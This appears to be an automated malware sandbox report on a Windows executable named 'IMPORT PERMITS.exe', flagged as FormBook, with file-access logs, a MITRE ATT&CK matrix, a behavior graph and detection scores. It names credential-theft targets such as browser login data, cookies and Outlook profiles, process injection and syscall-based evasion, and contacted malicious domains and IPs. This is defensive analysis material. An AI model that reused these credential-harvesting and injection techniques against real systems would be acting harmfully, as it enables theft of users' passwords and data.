                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.IMPORT PERMITS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.IMPORT PERMITS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4121846462.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4121706840.00000000008C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2058360059.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4123927554.00000000057E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4121787054.0000000004A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2058495171.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\PATHPING.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.IMPORT PERMITS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.IMPORT PERMITS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4121846462.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4121706840.00000000008C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2058360059.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4123927554.00000000057E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4121787054.0000000004A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2058495171.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1547340 Sample: IMPORT  PERMITS.exe Startdate: 02/11/2024 Architecture: WINDOWS Score: 100 31 www.deepfy.xyz 2->31 33 www.cmdh1c.xyz 2->33 35 22 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 53 4 other signatures 2->53 10 IMPORT  PERMITS.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 33->51 process4 file5 29 C:\Users\user\...\IMPORT  PERMITS.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 IMPORT  PERMITS.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 gKZXbGXeVZyo.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 PATHPING.EXE 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 gKZXbGXeVZyo.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 official.roamimg.strawberrycdn.com 103.233.82.58, 49385, 49386, 49387 VPLSVPLSASIATH Thailand 23->37 39 www.redex.fun 185.68.16.94, 49373, 49374, 49375 UKRAINE-ASUA Ukraine 23->39 41 9 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                IMPORT PERMITS.exe68%ReversingLabsByteCode-MSIL.Trojan.Taskun
                IMPORT PERMITS.exe56%VirustotalBrowse
                IMPORT PERMITS.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                www.dbasky.net0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                http://www.fontbureau.com/designersG0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                http://www.fontbureau.com/designers/?0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.fontbureau.com/designers?0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                http://www.fontbureau.com/designers0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.fonts.com0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.fontbureau.com0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
